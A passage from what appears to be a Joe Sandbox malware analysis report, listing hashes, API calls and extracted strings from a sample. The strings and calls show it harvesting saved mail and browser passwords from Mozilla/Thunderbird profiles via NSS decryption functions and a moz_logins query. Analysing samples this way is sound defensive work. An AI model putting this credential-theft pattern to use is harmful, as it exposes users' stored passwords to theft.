                  • Opcode ID: 4ef98d3589c27af49cae22675b267854afe1d3363596bc0cac78b0a9285f8b1d
                  • Instruction ID: 237572770da6cdec3f20c1cd15f55f1c4e3d09a34ceac29ab19b180c030d7de4
                  • Opcode Fuzzy Hash: 4ef98d3589c27af49cae22675b267854afe1d3363596bc0cac78b0a9285f8b1d
                  • Instruction Fuzzy Hash: 2AC04C36511120BBD7505B69FC0ABC576989709326F15C07EB901A2256CBB80E878FDC
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 45a2655c9ce598f9aff01b1782757f780416675e5ac7cea9a557e58993665817
                  • Instruction ID: c8780dc2752f1dd6eab6e238a0c3ddba928e41edca2983f589a9e6463379b6bc
                  • Opcode Fuzzy Hash: 45a2655c9ce598f9aff01b1782757f780416675e5ac7cea9a557e58993665817
                  • Instruction Fuzzy Hash: 0FA1CE37BA4B0A07E30889EAACC6395B5D397D8314F6E423D9B34C73D2E9FC59168194
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bbcacfff3d007f8ba4df6050e74c9d9e9b3729906fc48c14092c1c50e174df2
                  • Instruction ID: f119ae820a612d4e49c816f819756393efe6ef5ca55a1a060cd83ef1bb4a5302
                  • Opcode Fuzzy Hash: 0bbcacfff3d007f8ba4df6050e74c9d9e9b3729906fc48c14092c1c50e174df2
                  • Instruction Fuzzy Hash: 09018C757286068FD308CFA9EC80966B3B2FB992657188538DA11C3266DE34A511CA54
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                  APIs
                  • strlen.MSVCRT ref: 004102D0
                  • strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
                  • memcpy.MSVCRT ref: 0041035C
                  • atoi.MSVCRT ref: 0041036D
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                  • String ID: $PA$$QA$$RA$,PA$,QA$,RA$4PA$4QA$4RA$<PA$<QA$<RA$DPA$DQA$DRA$LPA$LQA$LRA$TPA$TQA$TRA$\PA$\QA$\RA$dPA$dQA$dRA$lPA$lQA$lRA$tPA$tQA$tRA$|PA$|QA$|RA$PA$PA$QA$QA$RA$RA
                  • API String ID: 1895597112-403538104
                  • Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                  • Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
                  • Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                  • Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcmp$_stricmp$memcpystrlen
                  • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                  • API String ID: 1113949926-2499304436
                  • Opcode ID: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                  • Instruction ID: fdd8238c1ffaca80b8f1a937c0ff3988063f93198c4aeb5310ca970d52cdd6dd
                  • Opcode Fuzzy Hash: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                  • Instruction Fuzzy Hash: 8E9160B21097049DE628B632ED02BDB73D8AF4431CF21052FF55AE6182EEBDB991465C
                  APIs
                  • memset.MSVCRT ref: 0040C9CF
                  • strlen.MSVCRT ref: 0040C9DA
                  • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
                  • _stricmp.MSVCRT(00000000,server), ref: 0040CA24
                  • _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
                  • strlen.MSVCRT ref: 0040CA66
                  • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
                  • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
                  • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
                  • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
                  • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
                  • atoi.MSVCRT ref: 0040CB30
                    • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
                    • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
                    • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
                  • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
                  • _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
                  • strlen.MSVCRT ref: 0040CB72
                  • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
                  • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
                  • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
                  • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
                  • strlen.MSVCRT ref: 0040CC20
                  • strlen.MSVCRT ref: 0040CC2A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                  • API String ID: 736090197-593045482
                  • Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                  • Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
                  • Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                  • Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
                  APIs
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • memset.MSVCRT ref: 0040D0C4
                  • memset.MSVCRT ref: 0040D0D6
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
                  • strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
                  • memset.MSVCRT ref: 0040D1BF
                  • memset.MSVCRT ref: 0040D1D3
                  • memset.MSVCRT ref: 0040D239
                  • memset.MSVCRT ref: 0040D24D
                  • memset.MSVCRT ref: 0040D261
                  • sprintf.MSVCRT ref: 0040D279
                  • sprintf.MSVCRT ref: 0040D28B
                  • sprintf.MSVCRT ref: 0040D29D
                  • _stricmp.MSVCRT(?,?), ref: 0040D2B3
                  • _stricmp.MSVCRT(?,?), ref: 0040D2CC
                  • _stricmp.MSVCRT(?,?), ref: 0040D2E5
                  • _stricmp.MSVCRT(?,00000204), ref: 0040D301
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
                  • String ID: O4A$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                  • API String ID: 1176642800-900804342
                  • Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                  • Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
                  • Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                  • Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
                  APIs
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • memset.MSVCRT ref: 0040D430
                  • memset.MSVCRT ref: 0040D449
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
                  • memset.MSVCRT ref: 0040D4F2
                  • memset.MSVCRT ref: 0040D504
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
                  • strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
                  • memset.MSVCRT ref: 0040D5FC
                  • memset.MSVCRT ref: 0040D610
                  • memset.MSVCRT ref: 0040D676
                  • memset.MSVCRT ref: 0040D68A
                  • memset.MSVCRT ref: 0040D69E
                  • sprintf.MSVCRT ref: 0040D6B6
                  • sprintf.MSVCRT ref: 0040D6C8
                  • sprintf.MSVCRT ref: 0040D6DA
                  • _stricmp.MSVCRT(?,?), ref: 0040D6F0
                  • _stricmp.MSVCRT(?,?), ref: 0040D709
                  • _stricmp.MSVCRT(?,?), ref: 0040D722
                  • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                  Strings
                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                  • imap://%s, xrefs: 0040D6C2
                  • smtp://%s, xrefs: 0040D6D4
                  • mailbox://%s, xrefs: 0040D6B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                  • API String ID: 2893247534-4245710904
                  • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                  • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                  • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                  • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0040EB42
                  • GetDlgItem.USER32(?,000003E8), ref: 0040EB4E
                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0040EB5D
                  • GetWindowLongA.USER32(?,000000F0), ref: 0040EB69
                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0040EB72
                  • GetWindowLongA.USER32(?,000000EC), ref: 0040EB7E
                  • GetWindowRect.USER32(00000000,?), ref: 0040EB90
                  • GetWindowRect.USER32(?,?), ref: 0040EB9B
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EBAF
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EBBD
                  • GetDC.USER32 ref: 0040EBF6
                  • strlen.MSVCRT ref: 0040EC36
                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040EC47
                  • ReleaseDC.USER32(?,?), ref: 0040EC94
                  • sprintf.MSVCRT ref: 0040ED54
                  • SetWindowTextA.USER32(?,?), ref: 0040ED68
                  • SetWindowTextA.USER32(?,00000000), ref: 0040ED86
                  • GetDlgItem.USER32(?,00000001), ref: 0040EDBC
                  • GetWindowRect.USER32(00000000,?), ref: 0040EDCC
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EDDA
                  • GetClientRect.USER32(?,?), ref: 0040EDF1
                  • GetWindowRect.USER32(?,?), ref: 0040EDFB
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040EE41
                  • GetClientRect.USER32(?,?), ref: 0040EE4B
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040EE83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 1703216249-3046471546
                  • Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                  • Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
                  • Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                  • Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                  • LoadCursorA.USER32(00000067), ref: 0040115F
                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                  • EndDialog.USER32(?,00000001), ref: 0040121A
                  • DeleteObject.GDI32(?), ref: 00401226
                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                  • ShowWindow.USER32(00000000), ref: 00401253
                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                  • ShowWindow.USER32(00000000), ref: 00401262
                  • SetDlgItemTextA.USER32(?,000003EE,00418348), ref: 00401273
                  • memset.MSVCRT ref: 0040128E
                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                  • String ID: P4A
                  • API String ID: 2998058495-688682323
                  • Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                  • Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
                  • Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                  • Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
                  APIs
                  • EndDialog.USER32(?,?), ref: 0040E1DF
                  • GetDlgItem.USER32(?,000003EA), ref: 0040E1F7
                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040E216
                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040E223
                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040E22C
                  • memset.MSVCRT ref: 0040E254
                  • memset.MSVCRT ref: 0040E274
                  • memset.MSVCRT ref: 0040E292
